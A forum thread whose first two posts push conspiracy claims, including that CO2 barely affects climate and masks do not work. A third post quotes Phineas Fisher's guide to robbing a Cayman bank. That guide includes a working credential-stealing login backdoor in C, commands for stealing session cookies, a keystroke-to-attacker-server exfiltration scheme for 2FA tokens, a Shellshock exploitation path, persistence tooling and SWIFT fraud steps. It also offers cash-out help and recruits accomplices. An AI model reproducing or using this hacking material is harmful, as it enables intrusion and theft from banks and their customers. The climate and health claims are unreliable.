+ Reply to Thread
Results 1 to 7 of 7

Thread: Crime Theorists 'Crowdsourcing Network' Gaining Momentum?

  1. Link to Post #1
    Netherlands Avalon Member ExomatrixTV's Avatar
    Join Date
    23rd September 2011
    Location
    Netherlands
    Language
    English, Dutch, German, Limburgs
    Age
    57
    Posts
    22,731
    Thanks
    30,831
    Thanked 125,755 times in 20,829 posts

    Exclamation Crime Theorists 'Crowdsourcing Network' Gaining Momentum?

    Crime Theorists 'Crowdsourcing Network' Gaining Momentum?

    "Crowdsourcing" does not only have to mean to get financial funding/support ... you can also collect vital intel ... collect new key-data ... collect new valuable research (from crowd) sources.
    When you consider and want to know and take full responsibility for your quality of thinking not depending on any corrupt "authorities" doing the thinking for you, is something completely different from being a "believer" or "non-believer" >>> as most "non-believers" have the false assumption it is "just a belief" and refuse to consider anything controversial from the get-go.

    They rather "fit in" any mainstream sold narrative that is spoon-fed to them. Practicing discernment-skills can never be spoon-fed by anything that comes close to being corrupt.
    • When you have real evidence of corruption, they will most likely accuse you for spreading "fringe conspiracy theories" them not realizing that having a "conspiracy theory" is not that different to having a crime theory ... so who benefits if crime theories are not investigated through crowdsourcing networking cross-referencing multiple angles & multiple perceptions of the same crime theory ...
    Expanding of man-power networking is exactly what they are afraid of ... because almost everybody can have an important piece of the puzzle, when combined it can speed up the mounting of correct evidence & proof that is needed to eventually come to a certain conclusion. This takes a lot of effort & time, what most "non-believers" (and even "believers") will never do.

    This whole process of multi-layer investigations is sadly enough often doomed to be infiltrated by (multiple) decoys, distractions, dis-info agents planting false evidence later used to dismiss the whole thing ... add "making mistakes" which can happen to the best of us and the mainstream-media demonization process will start!

    "Fact-checkers sites" (often funded directly or indirectly by corrupt billionaire philanthropists), are happy to use planted false evidence & human mistakes as their bases to accuse you "spreading harmful misinformation". <<< most do not know that these claims are based upon inserted dis-info to distract the common people what is really going on plus using own provable misinformation on top of it with countless false assumptions.
    • Anyone that tries to explain the above will be dismissed without research anything. They solely rely on "authorities" telling them how to think & judge, and they even feel good about it.
    Sadly enough, many gullible "good people" fall for these PsyOp tactics, until they see more and more that those "controversial conspiracy researchers" are actually "crowdsourcing crime theorists network" >>> a network of often highly intelligent & smart people helping each-other to get to the bottom of things that mainstream media FAILS to do over and over and over and over again.

    And those "crowdsourcing crime theorists network" can predict controversial events much better and more accurately than all mainstream pushed corporate "think tanks" combined.

    More "new normal" people are starting to see it too <<< that is why they need to implement mass-ensorship which was once just a "crazy conspiracy theory" but nowadays rampant mass censorship is mainstream accepted knowledge even encouraged by mass media, deep-state liberals and deep-state republicans!

    Tyranny & Authoritarianism sold as "good" all in the open! ... If you could record all the current mainstream propaganda and show it people before 2020 they would never have believed it ... but that is the whole thing it was/is never about "believe" in the first place ... much more about having courage to go beyond the mass conditioning ... which a lot of people already did but never considered by "good people" blindly following "authorities" talking points spoon-fed to them 24/7.
    • The quality of any "authoritative" skeptic selected & pushed forward by mainstream media can be best measured in his or her ability to make an honest representation of that of what they attack. (spoiler alert: they can't).
    How correct their alleged "summaries" are determines how good they are understanding other points of view, other perceptions & perspectives that challenge their heavily guarded (WEF) narratives aka propaganda talking points.

    If you are a neutral person, you always have to ask: ... Do I trust this mainstream pushed "authoritative" skeptic talking-head ... to be honest in how he or she represents "the other", is it an open honest debate? ... is there room for corrections? ... are rebuttals allowed? ... do they allow a real vindication processes if it warrants later on? ... now the fun-fact: nowadays since the Corona Hysteria in 2020 started, it is not allowed anymore ... you are demanded to blindly trust them … that is the "new normal" normalizing insanity 24/7 defying common sense & logic ... Lucky for us, more and more people finally starting to see the madness & insanity too.
    • Having a conspiracy theory is not that different from having a crime theory ... so who exactly benefits if certain crime theories are not further investigated and systematically downplayed & marginalized?
    * If a conspiracy is (partly) in the open does NOT make it any less criminal nor less harmful.



    Almost every conspiracy researcher will have besides verifiable facts & evidence: theories & different insights that yet have to be proven ... The percentage of his or her work that uses: speculations, theories, assumptions, conjecture varies person to person ...

    Some use these to have a "story-line" about a controversial topic that "only makes sense" if these speculations, theories, assumptions are correct ... That explains why some of them talk as if it is already proven without having any real proof nor evidence. They often ask or expect you to go along with their beliefs, conjecture, story-lines, speculations, assumptions and may get annoyed or even angry if you ask for (or demand) proof or evidence of their claims we can study.

    The thing is SOME of it indeed can eventually be proven with evidence and some of it still awaits vindication, so you have to have patience ... but some of it will never be proven because it is literary made up to make it sound "believable" or "more interesting" or "more credible" but turned out to be the opposite!

    When certain conspiracy researchers expect you to "go along" with a certain strain of thoughts and reasoning "to make sense" of a controversial topic, they tend to say: "you know?" or "right?" or "okay?" way too many times, especially when they are interviewed.

    I wish people stop saying during controversial interviews: "you know?", "right?" and "okay?" every minute! ... Sometimes even every 15 seconds
    • Why do I wish people stop asking for confirmation all the time during controversial interviews?
    Because a lot of what is claimed can not (easily) be verified ... It is more than often second hand insights, stories & claims mixed with assumptions & conjecture. Just because multiple independent sources claim the same or similar things, is not a reason to be 100% sure.

    * just because you have psychic abilities (as I have them too!) does not make it "flawless".

    It is okay to have certain perspectives as long as you do not sell it as "absolute" ... When people are insecure, they may over-shout themselves to compensate for their lack of confidence.

    To live in self-honesty, you have to allow space to be corrected if need be... even when it never happens, you still allow others to see more than just one way of thinking.

    When you speculate, that's perfectly fine as long as you say it is just that. But so many start "brainstorming" in their heads of so many possible scenarios - possible motives - possible end-goals - possible tactics & mind-games that indeed are ALL is possible <<< but that does not mean it is happening the way you think it is.
    • We can project our fears, expectations, doom scenarios, transformations, hopes, pessimism, optimisms all wrapped in a "coherent" story seeking like-minded spirits to help co-create (manifest) that what we want to see happening or prevent from happening. But at the same time, when you are doing that, you INJECT many assumptions in to the psyche of others. Now you see why I have issues with people saying: "you know?", "right?", "okay?" dozens of times per hour! ... Because it is not always "okay" nor "right" nor "knowing".
    Especially when it is highly controversial. No need to "believe" anything, rather ask people to consider different points of view different perspectives to broaden the horizon of possibilities, nothing more.



    cheers,
    John Kuhles aka 'ExomatrixTV'
    March 22nd, 2023 🦜🦋🌳
    Last edited by ExomatrixTV; 24th March 2023 at 12:27.
    No need to follow anyone, only consider broadening (y)our horizon of possibilities ...

  2. The Following 9 Users Say Thank You to ExomatrixTV For This Post:

    East Sun (22nd March 2023), edina (22nd March 2023), Ewan (23rd March 2023), Harmony (23rd March 2023), mizo (23rd March 2023), NancyV (22nd March 2023), Orph (22nd March 2023), ronny (23rd March 2023), Sunny-side-up (23rd March 2023)

  3. Link to Post #2
    Netherlands Avalon Member ExomatrixTV's Avatar
    Join Date
    23rd September 2011
    Location
    Netherlands
    Language
    English, Dutch, German, Limburgs
    Age
    57
    Posts
    22,731
    Thanks
    30,831
    Thanked 125,755 times in 20,829 posts

    Default Re: Crime Theorists 'Crowdsourcing Network' Gaining Momentum?

    And there are more trees growing faster when there is more CO2 in the air (ppm - parts per million) ... and the only real climate change effect on all planets in our solar system is due to the 11-year cyclical Solar Storms highs & lows <<< that effect is so big, so huge that the transparent "CO2" part effecting the climate is below 0,001% in comparison ...

    When the Sun if making all Oceans & Seas (±70% of the Earth Surface which is 2 times the size of all countries on earth combined) create clouds THAT REAL CLIMATE CHANGE PROCESS can never ever be stopped ... not even with banning CO2 completely everywhere (what plants breathe ffs).

    * Cosmic Gamma Rays hitting The Earth are ALSO part of having gigantic Climate Change Effects they do not want you to discuss ... because it will also crush their tunnel vision (WEF) narratives.

    "NetZero2050" is a TOTAL SCAM as it will lead to plants having less to breathe and will do the opposite of "greening the planet" ... One of the Green Peace Founders said that the "Green Movement" it totally hijacked by unelected tyrannical Technocrats that seek excuses to impose & drastically change political systems.

    They need a perfect excuse to "justify" bypassing current laws ... and PUSH all kinds of unconstitutional actions, and most people have no clue how they being played/used, ... when they ever find out ... the harm is already done on a supermassive scale, and it only could happen if they believed the lies sold to them. So so sad.

    Truly understanding what "Self-Determination Rights" are ... is KNOWING it is the exact opposite of what WEF minions are doing worldwide with their Technocratic Tyrannical Dystopian "Global Governance" aka "Agenda2030" & "NetZero2050"

    Maybe the Ultra Elite KNOWS real abundance is coming for humanity ... and know that eventually they lose control over the masses ... thus they are in a big hurry to speed up the Depopulation Agenda and implement all kinds of unconstitutional "(fake) crisis" laws cementing their Future Dystopia aka Agenda2030 & "NetZero2050".

    cheers,
    John 🦜🦋🌳

    * source

    How to be a "Good Citizen":


    * Obey without questioning.
    * Comply without thinking.
    * Worship authority.
    * Have blind faith in government.
    * Have absolute trust in mainstream media.
    * Never question official narratives.

    ... and how to make sure others know you do all the above?
    * Wear a face diaper, you know it does not even work.

    * Would Abuse of Power on a Massive Scale be Possible Without These 25 Points?
    Last edited by ExomatrixTV; 22nd March 2023 at 21:20.
    No need to follow anyone, only consider broadening (y)our horizon of possibilities ...

  4. The Following 6 Users Say Thank You to ExomatrixTV For This Post:

    East Sun (22nd March 2023), Ernie Nemeth (22nd March 2023), Ewan (23rd March 2023), Harmony (23rd March 2023), NancyV (22nd March 2023), ronny (23rd March 2023)

  5. Link to Post #3
    Aaland Avalon Member Blastolabs's Avatar
    Join Date
    3rd November 2020
    Language
    English
    Posts
    442
    Thanks
    1,649
    Thanked 3,352 times in 432 posts

    Default Re: Crime Theorists 'Crowdsourcing Network' Gaining Momentum?

    The best real world example I am familiar with is Phineas Phisher.

    Why?

    Well in just a few weeks of human perceived time he hacked the CIA, hacked the NSA, then stole a couple hundred thousand dollars from a bank in the Cayman Islands

    Why?

    Quote:
    Make no mistake, expropriation is not theft. It is not the confiscation of money earned "with the sweat of the forehead". It is not theft of private property. It is, rather, the recovery of enormous amounts of land and wealth that have been forged with stolen natural resources, human slavery, forced labor force and amassed in hundreds of years by a small minority. This wealth ... is illegitimate, both for moral purposes and for the exploitation mechanisms that have been used to create it.
    For Colin, the first step is that “we have to free ourselves from our mental ties (believing that wealth and private property have been earned by those who monopolize them; and that, therefore, they should be something to respect, revere, and even something to pursue), open our minds, study and learn from history, and recognize this illegitimacy together”. Here are some books that have helped me with this: [7] [8] [9] [10] [11].

    According to Barack Obama, economic inequality is "the challenge that defines our time." Computer hacking is a powerful tool to combat economic inequality.

    The former director of the NSA, Keith Alexander, agrees and says that hacking is responsible for "the greatest transfer of wealth in history."

    ______________________________
    / The story is ours \
    \ and it is done by hackers! /
    ----------------------------

    \
    \ ^__^
    (oo)\_______
    ( (__)\ )\/\
    _) / ||----w |
    (.)/ || ||
    `'

    Everyone together, now and forever!

    [1] https://sursiendo.com/docs/Pensar_de...omunes_web.pdf
    [2] https://chomsky.info/commongood02/
    [3] The Will to Change: Men, Masculinity, and Love
    [4] their own religion is very clear about this: https://dailyverses.net/es/materialismo
    [5] https://elpulso.hn/la-filantropia-en...l-capitalismo/
    [6] http://www.hamptoninstitution.org/ex...n-or-bust.html
    [7] Manifiesto por una Civilización Democrática. Volumen 1, Civilización: La Era de los Dioses Enmascarados y los Reyes Cubiertos
    [8] Calibán y la Bruja
    [9] En deuda: Una historia alternativa de la economía
    [10] La otra historia de los Estados Unidos
    [11] Las venas abiertas de América Latina[/QUOTE]


    why/HOW?

    Code:
      _______________________________
           < Our weapons are our keyboards >
            --------------------------------
                      \
                       \ ^__^
                         (oo)\_______
                      (  (__)\       )\/\
                       _) /  ||----w |
                      (.)/   ||     ||
                       `'    ^^     ^^
     [2 - Introduction]
    This guide explains how I hacked the Cayman Bank and Trust Company (Isle of Man).  Why am I publishing this, almost four years later?
     1) To show what is possible
    Hackers working for social change have limited themselves to developing security and privacy tools, DDoS, performing vandalism and leaks. Wherever you go, there are radical projects for a social change in a complete state of precariousness, and there would be much that they could do with some expropriated money. At least for the working class, bank robbery is something socially accepted, and those who do are seen as heroes of the people. In the digital age, robbing a bank is a non-violent, less risky act, and the reward is greater than ever. So why are only black hat hackers doing it for their personal benefit, and never hacktivists to finance radical projects? Maybe they don't think they are capable of doing it. The big bank hacks are on the news every so often, such as the hacking of the Bank of Bangladesh [1], which was attributed to North Korea, or the hacking of banks attributed to the Carbanak group [2], which they describe as a very large and well organized group of Russian hackers, with different members who would be specialized in different tasks. But, it is not that complicated.
    
    It is because of our collective belief that the financial system is unquestionable that we exercise control over ourselves, and maintain the class system without those above having to do anything [3]. Being able to see how vulnerable and fragile the financial system really is helps us break that collective hallucination. That is why banks have a strong incentive not to report hacks, and to exaggerate how sophisticated the attackers are. None of the financial hacks I made, or those I've known, have ever been reported. This is going to be the first, and not because the bank wanted to, but because I decided to publish it.
    
    As you are about to learn in this home guide, hacking a bank and transferring money through the SWIFT network does not require the support of any government or a large and specialized group.  It is something totally possible being a mere amateur hacker, with only public tools and basic knowledge of how to write a script.
    [1] https://elpais.com/economia/2016/03/...94_374693.html 
    [2] https://securelist.lat/el-gran-robo-...arbanak/67508/ 
    [3] https://es.wikipedia.org/wiki/Hegemon%C3%ADa_cultural 
     2) Help withdraw cash
    Many of those who read this already have, or with a little study will be able to acquire, the skills needed to carry out a hack like this. 
     However, many will find that they lack the necessary criminal connections to get the handles in condition. In my case, this was the first bank that hacked, and at that time I only had a few and mediocre accounts ready to withdraw the cash (known as bank drops), so it was only a few hundred thousand that I could withdraw at total, when it is normal to get millions. Now, on the other hand, I do have the knowledge and connections to get cash more seriously, so if you are hacking a bank but need help to convert that into real money, and you want to use that money to finance radical social projects, you can contact me.
    
     3) Collaborate
    It is possible to hack banks as an amateur who works alone, but the net is that, in general, it is not as easy as I paint it here.  I was lucky with this bank for several reasons:
    1. It was a small bank, so it took me much less time to understand how everything worked.
    2. They had no procedure to check the sent swift messages.  Many banks have one, and you need to write code to hide your transfers from their monitoring system.
    3. They only used password authentication to access the application with which they connected to the SWIFT network. Most banks now use RSA SecurID, or some form of 2FA.  You can skip this by typing code to get an alert when your token enters, so you can use it before it expires. It's simpler than it seems: I used Get-Keystrokes [1], modifying it so that instead of storing the pressed keys, a GET request is made to my server every time it is detected that they have entered a username. This request adds the username to the url and, as they type the token, several GETs are made with the token digits concatenated to the url. On my side I leave this running in the meantime:
      ssh me@my_secret_server 'tail -f /var/log/apache2/access_log'
        | while read i; do echo $i; aplay alarma.wav &> /dev/null; done
     If it is a web application, you can skip the 2FA by stealing the cookie after they have authenticated. I am not an APT with a team of coders who can make me customized tools. I am a simple person who subsists on what the terminal gives [2], so what I use is:
    procdump64 /accepteula -r -ma PID_of_browser
     strings64 /accepteula * .dmp |  findstr PHPSESSID 2> nul
     or going through findstr rather than strings, which makes it much faster:
    findstr PHPSESSID * .dmp> tmp
         strings64 /accepteula tmp |  findstr PHPSESSID 2> nul
    
    Another way to skip it is to access your session with a hidden VNC (hvnc) after they have authenticated, or with a little creativity you could also focus on another part of their process instead of sending SWIFT messages directly.
    
    I think that if I collaborated with other experienced bank hackers we could hack hundreds of banks like Carnabak, instead of doing one from time to time on my own.  So if you have experience with similar hacks and want to collaborate, contact me.  You will find my email and my PGP key at the end of the previous guide [3].
    
    [1] https://github.com/PowerShellMafia/P...Keystrokes.ps1
    [2] https://lolbas-project.github.io/
    [3] https://www.exploit-db.com/papers/41914
    ________________________________________
    / If robbing a bank could change things, \
    \ they’d make it illegal.                /
     ----------------------------------------
             \
              \ ^__^
                (oo)\_______
             (  (__)\       )\/\
              _) /  ||----w |
             (.)/   ||     ||
    
    
    [3 - Be careful out there]
    It is important to take some simple precautions. I will refer to this same section of my last guide [1], since it seems to work just fine [2]. All I have to add is that, in Trump's words, "Unless you catch hackers in the act, it is difficult to determine who was doing the hacking," so the police are getting more and more creative [3][4] in their attempts to grab criminals in the act (when their encrypted hard drives are unlocked). So it would be nice if for example you carry a certain bluetooth device and configure your computer to turn off when it moves beyond a certain range, or when an accelerometer detects movement, or something like that. It may be that writing long articles detailing your actions and your ideology is not the safest thing in the world (oops!), but at times I feel I have to. If I didn't believe in who listens to me If I didn't believe in what hurts If I didn't believe in what's left If I didn't believe in what I fought What a thing ... What was the club without a quarry? [1] https://www.exploit-db.com/papers/41914 [2] https://www.wifi-libre.com/topic-126...as-fisher.html [3] https://www.wired.com/2015/05/silk-road-2/ [4] https://motherboard.vice.com/en_us/a...y-arrest-video Many blame queer people for the decline of this society; we are proud of it Some believe we want to reduce to ashes this civilization and its moral fabric; They couldn't be more right They often describe us as depraved, decadent and revolting But alas! They haven't seen anything yet (https://theanarchistlibrary.org/libr...e-gay-do-crime) [4 - Get access] In another place [1] I talked about the main ways to get initial access to a company's network during a targeted attack. However, this was not a targeted attack. I did not set out to hack a specific bank, what I wanted was to hack any bank, which ends up being a much simpler task. This type of nonspecific approach was popularized by Lulzsec and Anonymous [2]. As part of the earlier essay, I prepared an exploit and post-exploitation tools for a popular VPN device. Then I started scanning the entire internet with zmap and zgrab to identify other vulnerable devices [3]. I had the scanner save the vulnerable IPs, along with the common and alt names of the device's SSL certificate, the device's Windows domain names, and the reverse DNS lookup of the IP. I grepped the results for the word "bank", and there were plenty to choose from, but the truth is that I was attracted to the word "Cayman", and that's how I came to choose this one. [1] https://www.exploit-db.com/papers/41914 [2] https://web.archive.org/web/20190329...org/0x0098.png [3] https://github.com/zmap/zmap [4.1 - The Exploit] When I published my latest DIY guide [1] I did not reveal the details of the sonicwall exploit that I had used to hack Hacking Team, as it was very useful for other hacks (such as this one) and I still had not finished having fun with it. Determined then to hack Hacking Team, I spent weeks reverse engineering their sonicwall ssl-vpn model, and even managed to find several memory corruption vulnerabilities that were more or less difficult to exploit, before I realized that the device was easily exploitable with shellshock [2]. When shellshock came out, many sonicwall devices were vulnerable, with only a request to cgi-bin/welcome and a payload in the user-agent. Dell released a security update and an advisory for these versions. The version used by Hacking Team and this bank had the vulnerable bash version, but the cgi requests did not trigger the shellshock- except for the requests to a shell script, and there was one accessible: cgi-bin/jarrewrite.sh. This seems to have escaped Dell's notice, since they never released a security update or an advisory for that version of the sonicwall. And, kindly, Dell had setuid’d root on dos2unix, leaving the device easy to root. In my last guide many read that I spent weeks researching a device until I found an exploit, and assumed that it meant that I was some kind of elite hacker. The reality, that is, the fact that it took me two weeks to realize that it was trivially exploitable with shellshock, is perhaps less flattering to me, but I think it is also more inspiring. Shows that you can really do this for yourself. You don't need to be a genius, I certainly am not. Actually my work against Hacking Team started a year earlier. When I discovered Hacking Team and the Gamma Group in the CitizenLab investigations [3][4], I decided to explore a bit and see if I could find anything. I didn't get anywhere with Hacking Team, but I was lucky with Gamma Group, and I was able to hack their customer support portal with basic sql injection and file upload vulnerabilities [5][6]. However, although the customer support server gave me a pivot towards the internal network of Gamma Group, I was unable to penetrate further into the company.
    From this experience with the Gamma Group and other hacks, I realized that I was really limited by my lack of knowledge about privilege escalation and lateral movement in windows domains, active directory and windows in general. So I studied and practiced (see section 11), until I felt I was ready to pay a visit to Hacking Team almost a year later. The practice paid off, and this time I was able to make a complete commitment from the company [7]. Before I realized that I could enter with shellshock, I was willing to spend happy whole months of life studying exploit development and writing a reliable exploit for one of the memory corruption vulnerabilities I had encountered. I just knew that Hacking Team needed to be exposed, and that it would take me as much time as necessary and learn what I had to learn to get it. To perform these hacks you don't need to be bright. You don't even need great technical knowledge. You just need dedication, and believe in yourself.
    [1] https://www.exploit-db.com/papers/41914 [2] https://es.wikipedia.org/wiki/Shells...or_de_software) [3] https://citizenlab.ca/tag/hacking-team/ [4] https://citizenlab.ca/tag/finfisher/ [5] https://theintercept.com/2014/08/07/...ng-protesters/ [6] https://www.exploit-db.com/papers/41913 [7] https://web.archive.org/web/20150706...om/hackingteam [4.2 - The Backdoor] Part of the backdoor I prepared for Hacking Team (see the first footnote in section 6) was a simple wrapper on the login page to capture passwords: #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <stdlib.h> int main() { char buf[2048]; int nread, pfile; /* pull the log if we send a special cookie */ char *cookies = getenv("HTTP_COOKIE"); if (cookies && strstr(cookies, "our private password")) { write(1, "Content-type: text/plain\n\n", 26); pfile = open("/tmp/.pfile", O_RDONLY); while ((nread = read(pfile, buf, sizeof(buf))) > 0) write(1, buf, nread); exit(0); } /* the parent stores the POST data and sends it to the child, which is the actual login program */ int fd[2]; pipe(fd); pfile = open("/tmp/.pfile", O_APPEND | O_CREAT | O_WRONLY, 0600); if (fork()) { close(fd[0]); while ((nread = read(0, buf, sizeof(buf))) > 0) { write(fd[1], buf, nread); write(pfile, buf, nread); } write(pfile, "\n", 1); close(fd[1]); close(pfile); wait(NULL); } else { close(fd[1]); dup2(fd[0],0); close(fd[0]); execl("/usr/src/EasyAccess/www/cgi-bin/.userLogin", "userLogin", NULL); } } In the case of Hacking Team, they were logging on to the VPN with single-use passwords, so the VPN gave me access only to the network, and from there it took an extra effort to get domain admins on their network. In the other guide I wrote about side passes and privilege escalation in windows domains [1]. In this case, on the other hand, it was the same Windows domain passwords that were used to authenticate against the VPN, so I could get a good user password, including that of the domain admin. Now I had full access to his network, but usually this is the easy part. The most complicated part is to understand how they operate and how to get what you want out of their network. [1] https://www.exploit-db.com/papers/41914 [4.3 - Fun facts] Following the investigation they did about the hacking, I found it interesting to see that, by the same time I did it, the bank could have been compromised by someone else through a targeted phishing email [1]. As the old saying goes, "give a man an exploit and he will have access for a day, teach phishing and he will have access all his life" [2]. The fact that someone else, by chance and at the same time as me, put this small bank in the spotlight (they registered a domain similar to the real domain of the bank to be able to phish from there) suggests that bank hacks occur with much more frequently than is known. A fun suggestion for you to follow the investigations of your hacks is to have a backup access, one that you won't touch unless you lose normal access. I have a simple script that expects commands once a day, or less, just to maintain long-term access in case they block my regular access. Then I had a powershell empire [3] calling home more frequently to a different IP, and I used empire to launch meterpreter [4] against a third IP, where I did most of my work. When PWC started investigating the hacking, they found my use of empire and meterpreter and cleaned those computers and blocked those IPs, but they didn't detect my backup access. PWC had placed network monitoring devices, in order to analyze the traffic and see if there were still infected computers, so I didn't want to connect much to their network. I only launched mimikatz once to get the new passwords, and from there I could continue my research by reading their emails in the outlook web access. [1] page 47, Project Pallid Nutmeg.pdf, in torrent [2] https://twitter.com/thegrugq/status/563964286783877121 [3] https://github.com/EmpireProject/Empire [4] https://github.com/rapid7/metasploit-framework [5 - Understand Banking Operations] To understand how the bank operated, and how I could get money, I followed the techniques that I summarized in [1], in section “13.3 - Internal Recognition”. I downloaded a list of all file names, grepped for words like "SWIFT" and "transfer", and downloaded and read all files with interesting names. I also looked for emails from employees, but by far the most useful technique was to use keyloggers and screenshots to see how bank employees worked. I didn't know it at the time, but for this, Windows has a very good monitoring tool [2]. As described in technique no. 5 of section 13.3 in [1], I made a capture of the keys pressed throughout the domain (including window titles), I did a grep in search of SWIFT, and found some employees opening ‘SWIFT Access Service Bureau - Logon’. For those employees, I ran meterpreter as in [3], and used the post/windows/gather/screen_spy module to take screenshots every 5 seconds, to see how they worked. They were using a remote citrix app from the bottomline company [4] to access the SWIFT network, where each payment message SWIFT MT103 had to go through three employees: one to "create" the message, one to "verify" it, and another to "authorize it." Since I already had all their credentials thanks to the keylogger, I could easily perform all three steps myself. And from what I knew after seeing them work, they didn't review the SWIFT messages sent, so I should have enough time to get the money from my bank drops before the bank realized and tried to reverse the transfers. [1] https://www.exploit-db.com/papers/41914 [2] https://cyberarms.wordpress.com/2016...th-metasploit/ [3] https://www.trustedsec.com/blog/no_psexec_needed/ [4] https://www.bottomline.com/uk/produc...ccess-services _______________________________________ / Whoever robs a thief, gets 100 years \ \ of forgiveness. / --------------------------------------- \ \ ^__^ (oo)\_______ ( (__)\ )\/\ _) / ||----w | (.)/ || || `' [6 - Send the money] I had no idea what I was doing, so I was discovering it along the way. Somehow, the first transfers I sent went well. The next day, I screwed up by sending a transfer to Mexico that ended my fun. This bank sent its international transfers through its correspondent account in Natwest. I had seen that the correspondent account for transfers in pounds sterling (GBP) appeared as NWBKGB2LGPL, while for the others it was NWBKGB2LXXX. The Mexican transfer was in GBP, so I assumed that I had to put NWBKGB2LGPL as a correspondent. If I had prepared it better I would have known that the GPL instead of XXX indicated that the payment would be sent through the UK Fast Payment Service, rather than as an international transfer, which obviously will not work when you are trying of sending money to Mexico. So the bank got an error message. On the same day I also tried to send a payment of £200k to the UK using NWBKGB2LGPL, which was not made because 200k exceeded the shipping limit by fast payments, and would have had to use NWBKGB2LXXX instead. They also received an error message for this. They read the messages, investigated it, and found the rest of my transfers. [7 - The loot] From what I write, you can get a complete idea of what my ideals are and to what things I give my support. But I would not like to see anyone in legal trouble for receiving expropriated funds, so not another word of where the money went. I know that journalists are probably going to want to put some number on how many dollars were distributed in this hack and similar ones, but I prefer not to encourage our perverse habit of measuring the actions just by their economic value. Any action is admirable if it comes from love and not from the ego. Unfortunately those above, the rich and powerful, public figures, businessmen, people in "important" positions, those that our society most respects and values, those have been placed where they are based on acting more since the ego than from love. It is in the simple, humble and "invisible" people that we should look at and whom we should admire. [8 - Cryptocurrencies] Redistributing expropriated money to Chilean projects seeking positive social change would be easier and safer if those projects accepted anonymous donations via cryptocurrencies such as monero, zcash, or at least bitcoin. It is understood that many of these projects have an aversion to cryptocurrencies, as they resemble some strange hypercapitalist dystopia rather than the social economy we dream of. I share their skepticism, but I think they are useful to allow donations and anonymous transactions, by limiting government surveillance and control. Same as cash, whose use many countries are trying to limit for the same reason. [9 - Powershell] In this operation, as in [1], I used a lot of powershell. Then, powershell was super cool, you could do almost anything you wanted, without antivirus detection and with very little forensic footprint. It happens that with the introduction of AMSI [2], offensive powershell is retiring. Today offensive C# is what is on the rise, with tools like [3][4][5][6]. AMSI is going to get to .NET for 4.8, so the tools in C# probably still have a couple of years left before they get dated. And then we will use C or C++ again, or maybe Delphi will become fashionable again. The specific tools and techniques change every few years, but basically it is not so much what changes, today hacking is essentially the same thing it was in the 90s. In fact, all the powershell scripts used in this guide and in the previous one are still perfectly usable today, after a little obfuscation of your own. [1] https://www.exploit-db.com/papers/41914 [2] https://medium.com/@byte_St0rm/adven...i-25d235eb749c [3] https://cobbr.io/SharpSploit.html [4] https://github.com/tevora-threat/SharpView [5] https://www.harmj0y.net/blog/redteaming/ghostpack/ [6] https://web.archive.org/web/20191114...nut-tikitorch/ ___________________________ / Fo Sostyn, Fo Ordaag \ \ Financial Sector **** Off / --------------------------- \ \ ^__^ (oo)\_______ ( (__)\ )\/\ _) / ||----w | (.)/ || || `' [10 - Torrent] Privacy for the weak, transparency for the powerful. Offshore banking provides executives, politicians and millionaires with privacy from of their own government. Exposing them may sound hypocritical on my part, since I am generally in favor of privacy and against government oversight. But the law was already written by and for the rich: it protects its system of exploitation, with some limits (such as taxes) so that society can function and the system does not collapse under the weight of its own greed. So no, privacy is not the same for the powerful, when it allows them to evade the limits of a system designed to give them privileges; and privacy for the weak, whom it protects from a system designed to exploit them. Even journalists with the best intentions find it impossible to study such a huge amount of material and know what will be relevant for people in different parts of the world. When I leaked the Hacking Team files, I gave The Intercept a copy of the emails one month in advance. They found a couple of the 0days that Hacking Team was using, previously reported them to MS and Adobe and published a few stories once the leak was made public. There is no point of comparison with the enormous amount of articles and research that came after the complete leak to the public. Seeing it this way, and also considering the (not) editorialized publication [1] of the Panama papers, I think that a public and complete leak of this material is the right choice. [1] https://www.craigmurray.org.uk/archi...m-panama-leak/ Psychologists found that those who are lower in the hierarchies tend to understand and empathize with those at the top, but vice versa is less common. This explains why, in this sexist world, many men joke about their inability to understand women, as if it were an irresolvable mystery. Explains why the rich, if they stop to think about those who live in poverty, give advice and "solutions" so alien to reality that we want to laugh. Explain why we revere executives as brave who take risks. What do they risk, beyond their privilege? If all their ventures fail, they will have to live and work like the rest of us. It also explains why there will be many who accuse me of being irresponsible and dangerous by leaking this without redaction. They feel the "danger" around an offshore bank and its customers much more intensely than they feel the misery of those dispossessed by this unfair and unequal system. And this leak of their finances, is it a danger to them, or perhaps only to their position at the top of a hierarchy that should not even exist? Translation: “They vilify us, these infamous people; When the only difference is that they steal from the poor, protected by the law, heaven knows, and we get the rich under the sole protection of our own courage. Don't you have to prefer to be one of us, rather than indulge those villains in search of a job? - Captain Bellamy” [11 - Learn to hack] You don't start hacking well. You start hacking ****, thinking it's good, and then gradually you get better. That is why I always say that one of the most valuable virtues is persistence. - Octavia Butler's advice for the APT candidate The best way to learn to hack is by hacking. Put together a laboratory with virtual machines and start testing things, taking a break to investigate anything you don't understand. At the very least you will want a windows server as a domain controller, another normal Windows vm attached to the domain, and a development machine with visual studio to compile and modify tools. Try to make an office document with macros that launch meterpreter or another RAT, and try meterpreter, mimikatz, bloodhound, kerberoasting, smb relaying, psexec and other lateral movement techniques[1]; as well as the other scripts, tools and techniques mentioned in this guide and in the previous one[2]. At first you can disable windows defender, but then try it all by having it activated [3][4] (but deactivating the automatic sending of samples). Once you're comfortable with all that, you'll be ready to hack 99% of companies. There are a couple of things that at some point will be very useful in your learning, such as getting comfortable with bash and cmd.exe, a basic domain of powershell, python and javascript, having knowledge of kerberos [5][6] and active directory [7][8][9][10], and fluent English. A good introductory book is The Hacker Playbook. I also want to write a little about things to not focus on if you don't want to entertain the idea of you hacking things just because someone has told you that you are not a “real” hacker if you don't know assembly. Obviously, learn whatever interests you, but I write these lines thinking about those things that you can focus on in order to get practical results if you're looking to hack companies to filter and expropriate. A basic knowledge of web application security [11] is useful, but specializing more in web security is not really the best use of your time, unless you want to make a career in pentesting or chasing bug rewards. CTFs, and most of the resources you'll find when looking for information about hacking, generally focus on skills such as web security, reverse engineering, exploit development, etc. These things make sense by understanding them as a way to prepare people for careers in the industry, but not for our goals. Intelligence agencies can afford to have a team dedicated to the most advanced techniques in fuzzing, a team working on exploit development with a guy investigating exclusively the new techniques of heap manipulation, etc. We don't have the time or the resources for that.
    The two most important skills for practical hacking are phishing [12] and social engineering to get initial access, and then being able to climb and move through the Windows domains.
